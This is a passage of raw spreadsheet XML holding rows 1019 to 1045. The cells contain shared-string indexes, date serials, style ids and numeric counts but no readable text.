      <c r="A1019" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1019" s="52">
        <v>43977.603855960646</v>
      </c>
      <c r="C1019" s="95" t="s">
        <v>3217</v>
      </c>
      <c r="D1019" s="96">
        <v>122</v>
      </c>
      <c r="E1019" s="95" t="s">
        <v>3221</v>
      </c>
      <c r="F1019" s="42">
        <v>101</v>
      </c>
      <c r="G1019" s="95" t="s">
        <v>3222</v>
      </c>
      <c r="H1019" t="s">
        <v>3223</v>
      </c>
      <c r="I1019" t="s">
        <v>156</v>
      </c>
      <c r="J1019" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K1019" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1019" t="s">
        <v>77</v>
      </c>
      <c r="M1019" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1019" t="s">
        <v>476</v>
      </c>
      <c r="Q1019" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="R1019">
        <v>14</v>
      </c>
      <c r="S1019">
        <v>10</v>
      </c>
      <c r="W1019" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1020" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1020" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1020" s="52">
        <v>43977.603855983798</v>
      </c>
      <c r="C1020" s="95" t="s">
        <v>3217</v>
      </c>
      <c r="D1020" s="96">
        <v>122</v>
      </c>
      <c r="E1020" s="95" t="s">
        <v>3224</v>
      </c>
      <c r="F1020" s="42">
        <v>101</v>
      </c>
      <c r="G1020" s="95" t="s">
        <v>3225</v>
      </c>
      <c r="H1020" t="s">
        <v>3226</v>
      </c>
      <c r="I1020" t="s">
        <v>156</v>
      </c>
      <c r="J1020" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K1020" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1020" t="s">
        <v>77</v>
      </c>
      <c r="M1020" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1020" t="s">
        <v>476</v>
      </c>
      <c r="Q1020" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="R1020">
        <v>112</v>
      </c>
      <c r="S1020">
        <v>128</v>
      </c>
      <c r="W1020" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1021" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1021" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1021" s="52">
        <v>44145.612867743053</v>
      </c>
      <c r="C1021" s="95" t="s">
        <v>3217</v>
      </c>
      <c r="D1021" s="96">
        <v>122</v>
      </c>
      <c r="E1021" s="95" t="s">
        <v>3227</v>
      </c>
      <c r="F1021" s="42">
        <v>103</v>
      </c>
      <c r="G1021" s="95" t="s">
        <v>3228</v>
      </c>
      <c r="H1021" t="s">
        <v>3229</v>
      </c>
      <c r="I1021" t="s">
        <v>156</v>
      </c>
      <c r="J1021" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K1021" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1021" t="s">
        <v>77</v>
      </c>
      <c r="M1021" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1021" t="s">
        <v>476</v>
      </c>
      <c r="Q1021" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="R1021">
        <v>49</v>
      </c>
      <c r="S1021">
        <v>39</v>
      </c>
      <c r="W1021" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1022" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1022" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1022" s="52">
        <v>43977.603856006943</v>
      </c>
      <c r="C1022" s="95" t="s">
        <v>3217</v>
      </c>
      <c r="D1022" s="96">
        <v>122</v>
      </c>
      <c r="E1022" s="95" t="s">
        <v>3230</v>
      </c>
      <c r="F1022" s="42">
        <v>100</v>
      </c>
      <c r="G1022" s="95" t="s">
        <v>3231</v>
      </c>
      <c r="H1022" t="s">
        <v>3232</v>
      </c>
      <c r="I1022" t="s">
        <v>156</v>
      </c>
      <c r="J1022" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K1022" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L1022" t="s">
        <v>77</v>
      </c>
      <c r="M1022" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N1022" t="s">
        <v>476</v>
      </c>
      <c r="Q1022" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="S1022">
        <v>1</v>
      </c>
      <c r="W1022" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1023" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1023" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1023" s="52">
        <v>44132.612051087963</v>
      </c>
      <c r="C1023" s="95" t="s">
        <v>3233</v>
      </c>
      <c r="D1023" s="96">
        <v>144</v>
      </c>
      <c r="E1023" s="95" t="s">
        <v>3234</v>
      </c>
      <c r="F1023" s="42">
        <v>102</v>
      </c>
      <c r="G1023" s="95" t="s">
        <v>3235</v>
      </c>
      <c r="H1023" t="s">
        <v>3236</v>
      </c>
      <c r="I1023" t="s">
        <v>172</v>
      </c>
      <c r="J1023" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K1023" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L1023" t="s">
        <v>83</v>
      </c>
      <c r="M1023" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O1023" s="95" t="s">
        <v>3237</v>
      </c>
      <c r="P1023" t="s">
        <v>951</v>
      </c>
      <c r="Q1023" s="95" t="s">
        <v>3238</v>
      </c>
      <c r="W1023" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1024" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1024" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1024" s="52">
        <v>44123.591835520834</v>
      </c>
      <c r="C1024" s="95" t="s">
        <v>3233</v>
      </c>
      <c r="D1024" s="96">
        <v>144</v>
      </c>
      <c r="E1024" s="95" t="s">
        <v>3239</v>
      </c>
      <c r="F1024" s="42">
        <v>101</v>
      </c>
      <c r="G1024" s="95" t="s">
        <v>3240</v>
      </c>
      <c r="H1024" t="s">
        <v>412</v>
      </c>
      <c r="I1024" t="s">
        <v>172</v>
      </c>
      <c r="J1024" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K1024" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L1024" t="s">
        <v>77</v>
      </c>
      <c r="M1024" s="95" t="s">
        <v>406</v>
      </c>
      <c r="N1024" t="s">
        <v>407</v>
      </c>
      <c r="Q1024" s="95" t="s">
        <v>3238</v>
      </c>
      <c r="W1024" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1025" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1025" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1025" s="52">
        <v>44139.372962187503</v>
      </c>
      <c r="C1025" s="95" t="s">
        <v>3233</v>
      </c>
      <c r="D1025" s="96">
        <v>144</v>
      </c>
      <c r="E1025" s="95" t="s">
        <v>3241</v>
      </c>
      <c r="F1025" s="42">
        <v>102</v>
      </c>
      <c r="G1025" s="95" t="s">
        <v>3242</v>
      </c>
      <c r="H1025" t="s">
        <v>416</v>
      </c>
      <c r="I1025" t="s">
        <v>172</v>
      </c>
      <c r="J1025" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K1025" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L1025" t="s">
        <v>77</v>
      </c>
      <c r="M1025" s="95" t="s">
        <v>406</v>
      </c>
      <c r="N1025" t="s">
        <v>407</v>
      </c>
      <c r="Q1025" s="95" t="s">
        <v>3238</v>
      </c>
      <c r="W1025" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1026" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1026" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1026" s="52">
        <v>44132.612051122684</v>
      </c>
      <c r="C1026" s="95" t="s">
        <v>3233</v>
      </c>
      <c r="D1026" s="96">
        <v>144</v>
      </c>
      <c r="E1026" s="95" t="s">
        <v>3243</v>
      </c>
      <c r="F1026" s="42">
        <v>101</v>
      </c>
      <c r="G1026" s="95" t="s">
        <v>3244</v>
      </c>
      <c r="H1026" t="s">
        <v>419</v>
      </c>
      <c r="I1026" t="s">
        <v>172</v>
      </c>
      <c r="J1026" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K1026" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L1026" t="s">
        <v>77</v>
      </c>
      <c r="M1026" s="95" t="s">
        <v>406</v>
      </c>
      <c r="N1026" t="s">
        <v>407</v>
      </c>
      <c r="Q1026" s="95" t="s">
        <v>3238</v>
      </c>
      <c r="W1026" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1027" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1027" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1027" s="52">
        <v>44126.700148321761</v>
      </c>
      <c r="C1027" s="95" t="s">
        <v>3233</v>
      </c>
      <c r="D1027" s="96">
        <v>144</v>
      </c>
      <c r="E1027" s="95" t="s">
        <v>3245</v>
      </c>
      <c r="F1027" s="42">
        <v>101</v>
      </c>
      <c r="G1027" s="95" t="s">
        <v>3246</v>
      </c>
      <c r="H1027" t="s">
        <v>422</v>
      </c>
      <c r="I1027" t="s">
        <v>172</v>
      </c>
      <c r="J1027" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K1027" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L1027" t="s">
        <v>77</v>
      </c>
      <c r="M1027" s="95" t="s">
        <v>406</v>
      </c>
      <c r="N1027" t="s">
        <v>407</v>
      </c>
      <c r="Q1027" s="95" t="s">
        <v>3238</v>
      </c>
      <c r="T1027">
        <v>5271</v>
      </c>
      <c r="U1027">
        <v>7652</v>
      </c>
      <c r="W1027" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1028" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1028" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1028" s="52">
        <v>44123.591835578707</v>
      </c>
      <c r="C1028" s="95" t="s">
        <v>3233</v>
      </c>
      <c r="D1028" s="96">
        <v>144</v>
      </c>
      <c r="E1028" s="95" t="s">
        <v>3247</v>
      </c>
      <c r="F1028" s="42">
        <v>101</v>
      </c>
      <c r="G1028" s="95" t="s">
        <v>3248</v>
      </c>
      <c r="H1028" t="s">
        <v>426</v>
      </c>
      <c r="I1028" t="s">
        <v>172</v>
      </c>
      <c r="J1028" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K1028" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L1028" t="s">
        <v>77</v>
      </c>
      <c r="M1028" s="95" t="s">
        <v>406</v>
      </c>
      <c r="N1028" t="s">
        <v>407</v>
      </c>
      <c r="Q1028" s="95" t="s">
        <v>3238</v>
      </c>
      <c r="W1028" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1029" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1029" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1029" s="52">
        <v>44139.372962199071</v>
      </c>
      <c r="C1029" s="95" t="s">
        <v>3233</v>
      </c>
      <c r="D1029" s="96">
        <v>144</v>
      </c>
      <c r="E1029" s="95" t="s">
        <v>3249</v>
      </c>
      <c r="F1029" s="42">
        <v>102</v>
      </c>
      <c r="G1029" s="95" t="s">
        <v>3250</v>
      </c>
      <c r="H1029" t="s">
        <v>430</v>
      </c>
      <c r="I1029" t="s">
        <v>172</v>
      </c>
      <c r="J1029" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K1029" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L1029" t="s">
        <v>77</v>
      </c>
      <c r="M1029" s="95" t="s">
        <v>406</v>
      </c>
      <c r="N1029" t="s">
        <v>407</v>
      </c>
      <c r="Q1029" s="95" t="s">
        <v>3238</v>
      </c>
      <c r="W1029" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1030" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1030" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1030" s="52">
        <v>44123.591835555555</v>
      </c>
      <c r="C1030" s="95" t="s">
        <v>3233</v>
      </c>
      <c r="D1030" s="96">
        <v>144</v>
      </c>
      <c r="E1030" s="95" t="s">
        <v>3251</v>
      </c>
      <c r="F1030" s="42">
        <v>101</v>
      </c>
      <c r="G1030" s="95" t="s">
        <v>3252</v>
      </c>
      <c r="H1030" t="s">
        <v>433</v>
      </c>
      <c r="I1030" t="s">
        <v>172</v>
      </c>
      <c r="J1030" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K1030" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L1030" t="s">
        <v>77</v>
      </c>
      <c r="M1030" s="95" t="s">
        <v>406</v>
      </c>
      <c r="N1030" t="s">
        <v>407</v>
      </c>
      <c r="Q1030" s="95" t="s">
        <v>3238</v>
      </c>
      <c r="W1030" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1031" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1031" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1031" s="52">
        <v>43907.411483553238</v>
      </c>
      <c r="C1031" s="95" t="s">
        <v>3253</v>
      </c>
      <c r="D1031" s="96">
        <v>101</v>
      </c>
      <c r="E1031" s="95" t="s">
        <v>3254</v>
      </c>
      <c r="F1031" s="42">
        <v>101</v>
      </c>
      <c r="G1031" s="95" t="s">
        <v>3255</v>
      </c>
      <c r="H1031" t="s">
        <v>527</v>
      </c>
      <c r="I1031" t="s">
        <v>528</v>
      </c>
      <c r="J1031" s="95" t="s">
        <v>529</v>
      </c>
      <c r="K1031" s="95" t="s">
        <v>39</v>
      </c>
      <c r="L1031" t="s">
        <v>83</v>
      </c>
      <c r="M1031" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q1031" s="95" t="s">
        <v>3256</v>
      </c>
      <c r="R1031">
        <v>182495</v>
      </c>
      <c r="S1031">
        <v>125921</v>
      </c>
      <c r="T1031">
        <v>730283</v>
      </c>
      <c r="U1031">
        <v>1167112</v>
      </c>
      <c r="V1031">
        <v>1166640</v>
      </c>
      <c r="W1031" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1032" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1032" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1032" s="52">
        <v>44095.585860370367</v>
      </c>
      <c r="C1032" s="95" t="s">
        <v>3253</v>
      </c>
      <c r="D1032" s="96">
        <v>200</v>
      </c>
      <c r="E1032" s="95" t="s">
        <v>3254</v>
      </c>
      <c r="F1032" s="42">
        <v>200</v>
      </c>
      <c r="G1032" s="95" t="s">
        <v>3255</v>
      </c>
      <c r="H1032" t="s">
        <v>527</v>
      </c>
      <c r="I1032" t="s">
        <v>528</v>
      </c>
      <c r="J1032" s="95" t="s">
        <v>529</v>
      </c>
      <c r="K1032" s="95" t="s">
        <v>39</v>
      </c>
      <c r="L1032" t="s">
        <v>83</v>
      </c>
      <c r="M1032" s="95" t="s">
        <v>72</v>
      </c>
      <c r="P1032" t="s">
        <v>530</v>
      </c>
      <c r="Q1032" s="95" t="s">
        <v>3257</v>
      </c>
      <c r="R1032">
        <v>2672</v>
      </c>
      <c r="S1032">
        <v>3942</v>
      </c>
      <c r="T1032">
        <v>11224</v>
      </c>
      <c r="U1032">
        <v>23126</v>
      </c>
      <c r="V1032">
        <v>16913</v>
      </c>
      <c r="W1032" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1033" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1033" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1033" s="52">
        <v>44159.674185833333</v>
      </c>
      <c r="C1033" s="95" t="s">
        <v>3097</v>
      </c>
      <c r="D1033" s="96">
        <v>160</v>
      </c>
      <c r="E1033" s="95" t="s">
        <v>3258</v>
      </c>
      <c r="F1033" s="42">
        <v>140</v>
      </c>
      <c r="G1033" s="95" t="s">
        <v>3259</v>
      </c>
      <c r="H1033" t="s">
        <v>3100</v>
      </c>
      <c r="I1033" t="s">
        <v>203</v>
      </c>
      <c r="J1033" s="95" t="s">
        <v>3101</v>
      </c>
      <c r="K1033" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L1033" t="s">
        <v>83</v>
      </c>
      <c r="M1033" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q1033" s="95" t="s">
        <v>3102</v>
      </c>
      <c r="T1033">
        <v>1635</v>
      </c>
      <c r="U1033">
        <v>2540</v>
      </c>
      <c r="V1033">
        <v>1541</v>
      </c>
      <c r="W1033" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1034" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1034" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1034" s="52">
        <v>43782.06062045139</v>
      </c>
      <c r="C1034" s="95" t="s">
        <v>3108</v>
      </c>
      <c r="D1034" s="96">
        <v>121</v>
      </c>
      <c r="E1034" s="95" t="s">
        <v>3260</v>
      </c>
      <c r="F1034" s="42">
        <v>101</v>
      </c>
      <c r="G1034" s="95" t="s">
        <v>3261</v>
      </c>
      <c r="H1034" t="s">
        <v>3262</v>
      </c>
      <c r="I1034" t="s">
        <v>185</v>
      </c>
      <c r="J1034" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K1034" s="95" t="s">
        <v>16</v>
      </c>
      <c r="L1034" t="s">
        <v>83</v>
      </c>
      <c r="M1034" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O1034" s="95" t="s">
        <v>1390</v>
      </c>
      <c r="P1034" t="s">
        <v>1824</v>
      </c>
      <c r="Q1034" s="95" t="s">
        <v>3112</v>
      </c>
      <c r="R1034">
        <v>17915</v>
      </c>
      <c r="S1034">
        <v>13548</v>
      </c>
      <c r="T1034">
        <v>106570</v>
      </c>
      <c r="U1034">
        <v>158841</v>
      </c>
      <c r="V1034">
        <v>180854</v>
      </c>
      <c r="W1034" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1035" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1035" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1035" s="52">
        <v>43767.499909386577</v>
      </c>
      <c r="C1035" s="95" t="s">
        <v>3108</v>
      </c>
      <c r="D1035" s="96">
        <v>121</v>
      </c>
      <c r="E1035" s="95" t="s">
        <v>3263</v>
      </c>
      <c r="F1035" s="42">
        <v>101</v>
      </c>
      <c r="G1035" s="95" t="s">
        <v>3264</v>
      </c>
      <c r="H1035" t="s">
        <v>3265</v>
      </c>
      <c r="I1035" t="s">
        <v>611</v>
      </c>
      <c r="J1035" s="95" t="s">
        <v>612</v>
      </c>
      <c r="K1035" s="95" t="s">
        <v>14</v>
      </c>
      <c r="L1035" t="s">
        <v>77</v>
      </c>
      <c r="M1035" s="95" t="s">
        <v>612</v>
      </c>
      <c r="N1035" t="s">
        <v>613</v>
      </c>
      <c r="O1035" s="95" t="s">
        <v>2122</v>
      </c>
      <c r="P1035" t="s">
        <v>612</v>
      </c>
      <c r="Q1035" s="95" t="s">
        <v>3112</v>
      </c>
      <c r="T1035">
        <v>1749</v>
      </c>
      <c r="U1035">
        <v>2539</v>
      </c>
      <c r="V1035">
        <v>1545</v>
      </c>
      <c r="W1035" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1036" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1036" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1036" s="52">
        <v>43783.664907627317</v>
      </c>
      <c r="C1036" s="95" t="s">
        <v>3266</v>
      </c>
      <c r="D1036" s="96">
        <v>100</v>
      </c>
      <c r="E1036" s="95" t="s">
        <v>3267</v>
      </c>
      <c r="F1036" s="42">
        <v>100</v>
      </c>
      <c r="G1036" s="95" t="s">
        <v>3268</v>
      </c>
      <c r="H1036" t="s">
        <v>2388</v>
      </c>
      <c r="I1036" t="s">
        <v>31</v>
      </c>
      <c r="J1036" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K1036" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L1036" t="s">
        <v>77</v>
      </c>
      <c r="M1036" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N1036" t="s">
        <v>263</v>
      </c>
      <c r="Q1036" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1036" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1037" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1037" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1037" s="52">
        <v>43783.664907615741</v>
      </c>
      <c r="C1037" s="95" t="s">
        <v>3266</v>
      </c>
      <c r="D1037" s="96">
        <v>100</v>
      </c>
      <c r="E1037" s="95" t="s">
        <v>3269</v>
      </c>
      <c r="F1037" s="42">
        <v>100</v>
      </c>
      <c r="G1037" s="95" t="s">
        <v>3270</v>
      </c>
      <c r="H1037" t="s">
        <v>1492</v>
      </c>
      <c r="I1037" t="s">
        <v>31</v>
      </c>
      <c r="J1037" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K1037" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L1037" t="s">
        <v>77</v>
      </c>
      <c r="M1037" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N1037" t="s">
        <v>263</v>
      </c>
      <c r="Q1037" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W1037" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1038" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1038" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1038" s="52">
        <v>44125.826187777777</v>
      </c>
      <c r="C1038" s="95" t="s">
        <v>3271</v>
      </c>
      <c r="D1038" s="96">
        <v>110</v>
      </c>
      <c r="E1038" s="95" t="s">
        <v>3272</v>
      </c>
      <c r="F1038" s="42">
        <v>110</v>
      </c>
      <c r="G1038" s="95" t="s">
        <v>3273</v>
      </c>
      <c r="H1038" t="s">
        <v>1425</v>
      </c>
      <c r="I1038" t="s">
        <v>172</v>
      </c>
      <c r="J1038" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K1038" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L1038" t="s">
        <v>83</v>
      </c>
      <c r="M1038" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O1038" s="95" t="s">
        <v>3274</v>
      </c>
      <c r="Q1038" s="95" t="s">
        <v>3275</v>
      </c>
      <c r="R1038">
        <v>194</v>
      </c>
      <c r="S1038">
        <v>62</v>
      </c>
      <c r="W1038" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1039" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1039" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1039" s="52">
        <v>43787.387686284725</v>
      </c>
      <c r="C1039" s="95" t="s">
        <v>3142</v>
      </c>
      <c r="D1039" s="96">
        <v>110</v>
      </c>
      <c r="E1039" s="95" t="s">
        <v>3276</v>
      </c>
      <c r="F1039" s="42">
        <v>100</v>
      </c>
      <c r="G1039" s="95" t="s">
        <v>3277</v>
      </c>
      <c r="H1039" t="s">
        <v>3278</v>
      </c>
      <c r="I1039" t="s">
        <v>75</v>
      </c>
      <c r="J1039" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K1039" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L1039" t="s">
        <v>83</v>
      </c>
      <c r="M1039" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N1039" t="s">
        <v>221</v>
      </c>
      <c r="O1039" s="95" t="s">
        <v>3279</v>
      </c>
      <c r="P1039" t="s">
        <v>222</v>
      </c>
      <c r="Q1039" s="95" t="s">
        <v>3146</v>
      </c>
      <c r="R1039">
        <v>141850</v>
      </c>
      <c r="S1039">
        <v>104322</v>
      </c>
      <c r="T1039">
        <v>644396</v>
      </c>
      <c r="U1039">
        <v>1004509</v>
      </c>
      <c r="V1039">
        <v>1051208</v>
      </c>
      <c r="W1039" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1040" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1040" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1040" s="52">
        <v>43775.748652488423</v>
      </c>
      <c r="C1040" s="95" t="s">
        <v>3280</v>
      </c>
      <c r="D1040" s="96">
        <v>100</v>
      </c>
      <c r="E1040" s="95" t="s">
        <v>3281</v>
      </c>
      <c r="F1040" s="42">
        <v>100</v>
      </c>
      <c r="G1040" s="95" t="s">
        <v>3282</v>
      </c>
      <c r="H1040" t="s">
        <v>3283</v>
      </c>
      <c r="I1040" t="s">
        <v>38</v>
      </c>
      <c r="J1040" s="95" t="s">
        <v>38</v>
      </c>
      <c r="K1040" s="95" t="s">
        <v>38</v>
      </c>
      <c r="L1040" t="s">
        <v>38</v>
      </c>
      <c r="M1040" s="95" t="s">
        <v>38</v>
      </c>
      <c r="N1040" t="s">
        <v>38</v>
      </c>
      <c r="O1040" s="95" t="s">
        <v>3284</v>
      </c>
      <c r="Q1040" s="95" t="s">
        <v>3285</v>
      </c>
      <c r="R1040">
        <v>701</v>
      </c>
      <c r="S1040">
        <v>736</v>
      </c>
      <c r="W1040" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="1041" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1041" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1041" s="52">
        <v>43775.748652476854</v>
      </c>
      <c r="C1041" s="95" t="s">
        <v>3280</v>
      </c>
      <c r="D1041" s="96">
        <v>100</v>
      </c>
      <c r="E1041" s="95" t="s">
        <v>3286</v>
      </c>
      <c r="F1041" s="42">
        <v>100</v>
      </c>
      <c r="G1041" s="95" t="s">
        <v>3287</v>
      </c>
      <c r="H1041" t="s">
        <v>3288</v>
      </c>
      <c r="I1041" t="s">
        <v>38</v>
      </c>
      <c r="J1041" s="95" t="s">
        <v>38</v>
      </c>
      <c r="K1041" s="95" t="s">
        <v>38</v>
      </c>
      <c r="L1041" t="s">
        <v>38</v>
      </c>
      <c r="M1041" s="95" t="s">
        <v>38</v>
      </c>
      <c r="N1041" t="s">
        <v>38</v>
      </c>
      <c r="O1041" s="95" t="s">
        <v>3289</v>
      </c>
      <c r="Q1041" s="95" t="s">
        <v>3285</v>
      </c>
      <c r="R1041">
        <v>282</v>
      </c>
      <c r="S1041">
        <v>350</v>
      </c>
      <c r="W1041" t="s">
        <v>107</v>
      </c>
    </row>
    <row r="1042" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1042" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1042" s="52">
        <v>43892.685863321756</v>
      </c>
      <c r="C1042" s="95" t="s">
        <v>3290</v>
      </c>
      <c r="D1042" s="96">
        <v>100</v>
      </c>
      <c r="E1042" s="95" t="s">
        <v>3291</v>
      </c>
      <c r="F1042" s="42">
        <v>100</v>
      </c>
      <c r="G1042" s="95" t="s">
        <v>3292</v>
      </c>
      <c r="H1042" t="s">
        <v>3293</v>
      </c>
      <c r="I1042" t="s">
        <v>203</v>
      </c>
      <c r="J1042" s="95" t="s">
        <v>204</v>
      </c>
      <c r="K1042" s="95" t="s">
        <v>28</v>
      </c>
      <c r="L1042" t="s">
        <v>83</v>
      </c>
      <c r="M1042" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q1042" s="95" t="s">
        <v>2312</v>
      </c>
      <c r="W1042" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1043" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1043" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B1043" s="52"/>
      <c r="C1043" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D1043" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E1043" s="95" t="s">
        <v>3294</v>
      </c>
      <c r="F1043" s="42">
        <v>100</v>
      </c>
      <c r="G1043" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H1043" t="s">
        <v>3295</v>
      </c>
      <c r="I1043" t="s">
        <v>546</v>
      </c>
      <c r="J1043" s="95" t="s">
        <v>547</v>
      </c>
      <c r="K1043" s="95" t="s">
        <v>20</v>
      </c>
      <c r="L1043" t="s">
        <v>83</v>
      </c>
      <c r="M1043" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q1043" s="95" t="s">
        <v>550</v>
      </c>
      <c r="W1043" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="1044" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1044" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B1044" s="52">
        <v>43907.505775127313</v>
      </c>
      <c r="C1044" s="95" t="s">
        <v>3296</v>
      </c>
      <c r="D1044" s="96">
        <v>111</v>
      </c>
      <c r="E1044" s="95" t="s">
        <v>3297</v>
      </c>
      <c r="F1044" s="42">
        <v>100</v>
      </c>
      <c r="G1044" s="95" t="s">
        <v>3298</v>
      </c>
      <c r="H1044" t="s">
        <v>3299</v>
      </c>
      <c r="I1044" t="s">
        <v>203</v>
      </c>
      <c r="J1044" s="95" t="s">
        <v>204</v>
      </c>
      <c r="K1044" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L1044" t="s">
        <v>83</v>
      </c>
      <c r="M1044" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q1044" s="95" t="s">
        <v>3102</v>
      </c>
      <c r="R1044">
        <v>69</v>
      </c>
      <c r="S1044">
        <v>95</v>
      </c>
      <c r="T1044">
        <v>488</v>
      </c>
      <c r="U1044">
        <v>676</v>
      </c>
      <c r="V1044">
        <v>1122</v>
      </c>
      <c r="W1044" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="1045" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1045" s="95" t="s">
        <v>3</v>
      </c>
